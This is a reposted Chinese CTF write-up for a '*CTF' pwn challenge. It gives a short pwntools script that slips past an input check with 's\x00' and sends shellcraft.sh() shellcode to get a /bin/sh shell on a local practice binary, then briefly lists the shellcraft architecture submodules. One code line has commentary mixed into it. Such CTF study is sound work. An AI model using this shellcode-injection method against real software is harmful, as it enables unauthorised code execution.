码上欢乐
相关内容   简体   繁体

*CTF——shellcode

本文转载自  查看原文  2019-04-28 23:26  647    pwn试题

一看题目是利用shellcode解决问题

伪代码:

EXP:

from pwn import*
   context(os='linux',arch='amd64',log_level='debug')
   p = process('./shellcode')
   shellcode ='s\x00'+ asm(shellcraft.sh()):i,j指针同时指向s,跳出内循环,\x00结束外循环,return 1;
   p.recvuntil("give me shellcode, plz:\n")
   p.sendline(shellcode)                                                                                 
   p.interactive()

return 1以后执行shellcraft.sh()则是执行/bin/sh的shellcode了

shellcraft模块是shellcode的模块,包含一些生成shellcode的函数。
其中的子模块声明架构,比如:

shellcraft.arm 是ARM架构的,

shellcraft.amd64是AMD64架构,

shellcraft.i386是Intel 80386架构的,

shellcraft.common是所有架构通用的。


 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 CTF必备技能丨Linux Pwn入门教程——ShellCode shellcode Shellcode ShellCode入门(提取ShellCode) 通用shellcode CTF 什么是CTF? 使用MSF生成shellcode Linux下shellcode的编写 shellcode超级免杀
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM